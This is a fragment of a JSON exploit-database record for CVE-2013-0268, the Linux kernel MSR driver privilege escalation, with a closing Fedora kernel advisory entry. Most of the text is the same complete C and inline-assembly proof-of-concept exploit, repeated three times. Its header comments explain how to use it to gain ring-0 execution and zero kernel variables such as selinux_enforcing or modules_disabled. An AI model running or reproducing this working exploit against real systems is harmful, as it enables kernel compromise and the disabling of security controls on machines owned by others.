https://twitter.com/grsecurity/status/297028324134359041 \n// \n// spender 2013 \n \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <sched.h> \n#include <unistd.h> \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <fcntl.h> \n#include <stdlib.h> \n#include <sys/time.h> \n#include <sys/resource.h> \n#include <sys/mman.h> \n \n#define SYSENTER_EIP_MSR 0x176 \n \nu_int64_t msr; \n \nunsigned long ourstack[65536]; \n \nu_int64_t payload_data[16]; \n \nextern void *_ring0; \nextern void *_ring0_end; \n \nvoid ring0(void) \n{ \n__asm volatile(\".globl _ring0\\n\" \n\"_ring0:\\n\" \n\".intel_syntax noprefix\\n\" \n\".code64\\n\" \n// set up stack pointer with 'ourstack' \n\"mov esp, ecx\\n\" \n// save registers, contains the original MSR value \n\"push rax\\n\" \n\"push rbx\\n\" \n\"push rcx\\n\" \n\"push rdx\\n\" \n// play with the kernel here with interrupts disabled! \n\"mov rcx, qword ptr [rbx+8]\\n\" \n\"test rcx, rcx\\n\" \n\"jz skip_write\\n\" \n\"mov dword ptr [rcx], 0\\n\" \n\"skip_write:\\n\" \n// restore MSR value before returning \n\"mov ecx, 0x176\\n\" // SYSENTER_EIP_MSR \n\"mov eax, dword ptr [rbx]\\n\" \n\"mov edx, dword ptr [rbx+4]\\n\" \n\"wrmsr\\n\" \n\"pop rdx\\n\" \n\"pop rcx\\n\" \n\"pop rbx\\n\" \n\"pop rax\\n\" \n\"sti\\n\" \n\"sysexit\\n\" \n\".code32\\n\" \n\".att_syntax prefix\\n\" \n\".global _ring0_end\\n\" \n\"_ring0_end:\\n\" \n); \n} \n \nunsigned long saved_stack; \n \nint main(int argc, char *argv[]) \n{ \ncpu_set_t set; \nint msr_fd; \nint ret; \nu_int64_t new_msr; \nstruct sched_param sched; \nu_int64_t resolved_addr = 0ULL; \n \nif (argc == 2) \nresolved_addr = strtoull(argv[1], NULL, 16); \n \n/* can do this without privilege */ \nmlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0); \nmlock(&payload_data, sizeof(payload_data)); \n \nCPU_ZERO(&set); \nCPU_SET(0, &set); \n \nsched.sched_priority = 99; \n \nret = sched_setscheduler(0, SCHED_FIFO, &sched); \nif (ret) { \nfprintf(stderr, \"Unable to set priority.\\n\"); \nexit(1); \n} \n \nret = sched_setaffinity(0, sizeof(cpu_set_t), &set); \nif (ret) { \nfprintf(stderr, \"Unable to set affinity.\\n\"); \nexit(1); \n} \n \nmsr_fd = open(\"/dev/cpu/0/msr\", O_RDWR); \nif (msr_fd < 0) { \nmsr_fd = open(\"/dev/msr0\", O_RDWR); \nif (msr_fd < 0) { \nfprintf(stderr, \"Unable to open /dev/cpu/0/msr\\n\"); \nexit(1); \n} \n} \nlseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET); \nret = read(msr_fd, &msr, sizeof(msr)); \nif (ret != sizeof(msr)) { \nfprintf(stderr, \"Unable to read /dev/cpu/0/msr\\n\"); \nexit(1); \n} \n \n// stuff some addresses in a buffer whose address we \n// pass to the \"kernel\" via register \npayload_data[0] = msr; \npayload_data[1] = resolved_addr; \n \nprintf(\"Old SYSENTER_EIP_MSR = %016llx\\n\", msr); \nfflush(stdout); \n \nlseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET); \nnew_msr = (u_int64_t)(unsigned long)&_ring0; \n \nprintf(\"New SYSENTER_EIP_MSR = %016llx\\n\", new_msr); \nfflush(stdout); \n \nret = write(msr_fd, &new_msr, sizeof(new_msr)); \nif (ret != sizeof(new_msr)) { \nfprintf(stderr, \"Unable to modify /dev/cpu/0/msr\\n\"); \nexit(1); \n} \n \n__asm volatile( \n\".intel_syntax noprefix\\n\" \n\".code32\\n\" \n\"mov saved_stack, esp\\n\" \n\"lea ecx, ourstack\\n\" \n\"lea edx, label2\\n\" \n\"lea ebx, payload_data\\n\" \n\"sysenter\\n\" \n\"label2:\\n\" \n\"mov esp, saved_stack\\n\" \n\".att_syntax prefix\\n\" \n); \n \nprintf(\"Success.\\n\"); \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122678/linuxmsr-escalate.txt"}], "zdt": [{"lastseen": "2018-03-19T07:10:50", "description": "Exploit for linux platform in category local exploits", "edition": 2, "published": "2013-08-03T00:00:00", "type": "zdt", "title": "Linux Kernel 'MSR' Driver Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0268"], "modified": "2013-08-03T00:00:00", "id": "1337DAY-ID-21051", "href": "https://0day.today/exploit/description/21051", "sourceData": "// PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host\r\n// can do whatever in the commented area, re-enable module support, etc\r\n// requires CONFIG_X86_MSR and just uid 0\r\n// a small race exists between the time when the MSR is written to the first\r\n// time and when we issue our sysenter\r\n// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed\r\n// configured to take a hex arg of a dword pointer to set to 0\r\n// (modules_disabled, selinux_enforcing, take your pick)\r\n//\r\n// Hello to Red Hat, who has shown yet again to not care until a\r\n// public exploit is released. Not even a bugtraq entry existed in\r\n// their system until this was published -- and they have a paid team\r\n// of how many?\r\n// It's not as if I didn't mention the problem and existence of an easy\r\n// exploit multiple times prior:\r\n// https://twitter.com/grsecurity/status/298977370776432640\r\n// https://twitter.com/grsecurity/status/297365303095078912\r\n// https://twitter.com/grsecurity/status/297189488638181376\r\n// https://twitter.com/grsecurity/status/297030133628416000\r\n// https://twitter.com/grsecurity/status/297029470072745984\r\n// https://twitter.com/grsecurity/status/297028324134359041\r\n//\r\n// spender 2013\r\n \r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <stdlib.h>\r\n#include <sys/time.h>\r\n#include <sys/resource.h>\r\n#include <sys/mman.h>\r\n \r\n#define SYSENTER_EIP_MSR 0x176\r\n \r\nu_int64_t msr;\r\n \r\nunsigned long ourstack[65536];\r\n \r\nu_int64_t payload_data[16];\r\n \r\nextern void *_ring0;\r\nextern void *_ring0_end;\r\n \r\nvoid ring0(void)\r\n{\r\n__asm volatile(\".globl _ring0\\n\"\r\n \"_ring0:\\n\"\r\n \".intel_syntax noprefix\\n\"\r\n \".code64\\n\"\r\n // set up stack pointer with 'ourstack'\r\n \"mov esp, ecx\\n\"\r\n // save registers, contains the original MSR value\r\n \"push rax\\n\"\r\n \"push rbx\\n\"\r\n \"push rcx\\n\"\r\n \"push rdx\\n\"\r\n // play with the kernel here with interrupts disabled!\r\n \"mov rcx, qword ptr [rbx+8]\\n\"\r\n \"test rcx, rcx\\n\"\r\n \"jz skip_write\\n\"\r\n \"mov dword ptr [rcx], 0\\n\"\r\n \"skip_write:\\n\"\r\n // restore MSR value before returning\r\n \"mov ecx, 0x176\\n\" // SYSENTER_EIP_MSR\r\n \"mov eax, dword ptr [rbx]\\n\"\r\n \"mov edx, dword ptr [rbx+4]\\n\"\r\n \"wrmsr\\n\"\r\n \"pop rdx\\n\"\r\n \"pop rcx\\n\"\r\n \"pop rbx\\n\"\r\n \"pop rax\\n\"\r\n \"sti\\n\"\r\n \"sysexit\\n\"\r\n \".code32\\n\"\r\n \".att_syntax prefix\\n\"\r\n \".global _ring0_end\\n\"\r\n \"_ring0_end:\\n\"\r\n );\r\n}\r\n \r\nunsigned long saved_stack;\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n cpu_set_t set;\r\n int msr_fd;\r\n int ret;\r\n u_int64_t new_msr;\r\n struct sched_param sched;\r\n u_int64_t resolved_addr = 0ULL;\r\n \r\n if (argc == 2)\r\n resolved_addr = strtoull(argv[1], NULL, 16);\r\n \r\n /* can do this without privilege */\r\n mlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0);\r\n mlock(&payload_data, sizeof(payload_data));\r\n \r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n \r\n sched.sched_priority = 99;\r\n \r\n ret = sched_setscheduler(0, SCHED_FIFO, &sched);\r\n if (ret) {\r\n fprintf(stderr, \"Unable to set priority.\\n\");\r\n exit(1);\r\n }\r\n \r\n ret = sched_setaffinity(0, sizeof(cpu_set_t), &set);\r\n if (ret) {\r\n fprintf(stderr, \"Unable to set affinity.\\n\");\r\n exit(1);\r\n }\r\n \r\n msr_fd = open(\"/dev/cpu/0/msr\", O_RDWR);\r\n if (msr_fd < 0) {\r\n msr_fd = open(\"/dev/msr0\", O_RDWR);\r\n if (msr_fd < 0) {\r\n fprintf(stderr, \"Unable to open /dev/cpu/0/msr\\n\");\r\n exit(1);\r\n }\r\n }\r\n lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);\r\n ret = read(msr_fd, &msr, sizeof(msr));\r\n if (ret != sizeof(msr)) {\r\n fprintf(stderr, \"Unable to read /dev/cpu/0/msr\\n\");\r\n exit(1);\r\n }\r\n \r\n // stuff some addresses in a buffer whose address we\r\n // pass to the \"kernel\" via register\r\n payload_data[0] = msr;\r\n payload_data[1] = resolved_addr;\r\n \r\n printf(\"Old SYSENTER_EIP_MSR = %016llx\\n\", msr);\r\n fflush(stdout);\r\n \r\n lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);\r\n new_msr = (u_int64_t)(unsigned long)&_ring0;\r\n \r\n printf(\"New SYSENTER_EIP_MSR = %016llx\\n\", new_msr);\r\n fflush(stdout);\r\n \r\n ret = write(msr_fd, &new_msr, sizeof(new_msr));\r\n if (ret != sizeof(new_msr)) {\r\n fprintf(stderr, \"Unable to modify /dev/cpu/0/msr\\n\");\r\n exit(1);\r\n }\r\n \r\n __asm volatile(\r\n \".intel_syntax noprefix\\n\"\r\n \".code32\\n\"\r\n \"mov saved_stack, esp\\n\"\r\n \"lea ecx, ourstack\\n\"\r\n \"lea edx, label2\\n\"\r\n \"lea ebx, payload_data\\n\"\r\n \"sysenter\\n\"\r\n \"label2:\\n\"\r\n \"mov esp, saved_stack\\n\"\r\n \".att_syntax prefix\\n\"\r\n );\r\n \r\n printf(\"Success.\\n\");\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21051"}, {"lastseen": "2018-01-04T19:00:01", "description": "Proof of concept exploit for the /dev/cpu/*/msr race condition that allows for privilege escalation in Linux kernels prior to 3.7.6.", "edition": 2, "published": "2013-08-05T00:00:00", "type": "zdt", "title": "Linux Kernel MSR Driver Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0268"], "modified": "2013-08-05T00:00:00", "id": "1337DAY-ID-21073", "href": "https://0day.today/exploit/description/21073", "sourceData": "// PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host\r\n// can do whatever in the commented area, re-enable module support, etc\r\n// requires CONFIG_X86_MSR and just uid 0\r\n// a small race exists between the time when the MSR is written to the first\r\n// time and when we issue our sysenter\r\n// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed\r\n// configured to take a hex arg of a dword pointer to set to 0\r\n// (modules_disabled, selinux_enforcing, take your pick)\r\n//\r\n// Hello to Red Hat, who has shown yet again to not care until a\r\n// public exploit is released. Not even a bugtraq entry existed in\r\n// their system until this was published -- and they have a paid team\r\n// of how many?\r\n// It's not as if I didn't mention the problem and existence of an easy\r\n// exploit multiple times prior:\r\n// https://twitter.com/grsecurity/status/298977370776432640\r\n// https://twitter.com/grsecurity/status/297365303095078912\r\n// https://twitter.com/grsecurity/status/297189488638181376\r\n// https://twitter.com/grsecurity/status/297030133628416000\r\n// https://twitter.com/grsecurity/status/297029470072745984\r\n// https://twitter.com/grsecurity/status/297028324134359041\r\n//\r\n// spender 2013\r\n \r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <stdlib.h>\r\n#include <sys/time.h>\r\n#include <sys/resource.h>\r\n#include <sys/mman.h>\r\n \r\n#define SYSENTER_EIP_MSR 0x176\r\n \r\nu_int64_t msr;\r\n \r\nunsigned long ourstack[65536];\r\n \r\nu_int64_t payload_data[16];\r\n \r\nextern void *_ring0;\r\nextern void *_ring0_end;\r\n \r\nvoid ring0(void)\r\n{\r\n__asm volatile(\".globl _ring0\\n\"\r\n \"_ring0:\\n\"\r\n \".intel_syntax noprefix\\n\"\r\n \".code64\\n\"\r\n // set up stack pointer with 'ourstack'\r\n \"mov esp, ecx\\n\"\r\n // save registers, contains the original MSR value\r\n \"push rax\\n\"\r\n \"push rbx\\n\"\r\n \"push rcx\\n\"\r\n \"push rdx\\n\"\r\n // play with the kernel here with interrupts disabled!\r\n \"mov rcx, qword ptr [rbx+8]\\n\"\r\n \"test rcx, rcx\\n\"\r\n \"jz skip_write\\n\"\r\n \"mov dword ptr [rcx], 0\\n\"\r\n \"skip_write:\\n\"\r\n // restore MSR value before returning\r\n \"mov ecx, 0x176\\n\" // SYSENTER_EIP_MSR\r\n \"mov eax, dword ptr [rbx]\\n\"\r\n \"mov edx, dword ptr [rbx+4]\\n\"\r\n \"wrmsr\\n\"\r\n \"pop rdx\\n\"\r\n \"pop rcx\\n\"\r\n \"pop rbx\\n\"\r\n \"pop rax\\n\"\r\n \"sti\\n\"\r\n \"sysexit\\n\"\r\n \".code32\\n\"\r\n \".att_syntax prefix\\n\"\r\n \".global _ring0_end\\n\"\r\n \"_ring0_end:\\n\"\r\n );\r\n}\r\n \r\nunsigned long saved_stack;\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n cpu_set_t set;\r\n int msr_fd;\r\n int ret;\r\n u_int64_t new_msr;\r\n struct sched_param sched;\r\n u_int64_t resolved_addr = 0ULL;\r\n \r\n if (argc == 2)\r\n resolved_addr = strtoull(argv[1], NULL, 16);\r\n \r\n /* can do this without privilege */\r\n mlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0);\r\n mlock(&payload_data, sizeof(payload_data));\r\n \r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n \r\n sched.sched_priority = 99;\r\n \r\n ret = sched_setscheduler(0, SCHED_FIFO, &sched);\r\n if (ret) {\r\n fprintf(stderr, \"Unable to set priority.\\n\");\r\n exit(1);\r\n }\r\n \r\n ret = sched_setaffinity(0, sizeof(cpu_set_t), &set);\r\n if (ret) {\r\n fprintf(stderr, \"Unable to set affinity.\\n\");\r\n exit(1);\r\n }\r\n \r\n msr_fd = open(\"/dev/cpu/0/msr\", O_RDWR);\r\n if (msr_fd < 0) {\r\n msr_fd = open(\"/dev/msr0\", O_RDWR);\r\n if (msr_fd < 0) {\r\n fprintf(stderr, \"Unable to open /dev/cpu/0/msr\\n\");\r\n exit(1);\r\n }\r\n }\r\n lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);\r\n ret = read(msr_fd, &msr, sizeof(msr));\r\n if (ret != sizeof(msr)) {\r\n fprintf(stderr, \"Unable to read /dev/cpu/0/msr\\n\");\r\n exit(1);\r\n }\r\n \r\n // stuff some addresses in a buffer whose address we\r\n // pass to the \"kernel\" via register\r\n payload_data[0] = msr;\r\n payload_data[1] = resolved_addr;\r\n \r\n printf(\"Old SYSENTER_EIP_MSR = %016llx\\n\", msr);\r\n fflush(stdout);\r\n \r\n lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);\r\n new_msr = (u_int64_t)(unsigned long)&_ring0;\r\n \r\n printf(\"New SYSENTER_EIP_MSR = %016llx\\n\", new_msr);\r\n fflush(stdout);\r\n \r\n ret = write(msr_fd, &new_msr, sizeof(new_msr));\r\n if (ret != sizeof(new_msr)) {\r\n fprintf(stderr, \"Unable to modify /dev/cpu/0/msr\\n\");\r\n exit(1);\r\n }\r\n \r\n __asm volatile(\r\n \".intel_syntax noprefix\\n\"\r\n \".code32\\n\"\r\n \"mov saved_stack, esp\\n\"\r\n \"lea ecx, ourstack\\n\"\r\n \"lea edx, label2\\n\"\r\n \"lea ebx, payload_data\\n\"\r\n \"sysenter\\n\"\r\n \"label2:\\n\"\r\n \"mov esp, saved_stack\\n\"\r\n \".att_syntax prefix\\n\"\r\n );\r\n \r\n printf(\"Success.\\n\");\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21073"}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0268"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-02-08T16:56:42", "published": "2013-02-08T16:56:42", "id": "FEDORA:34C90208BF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.7.6-201.fc18", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}]}
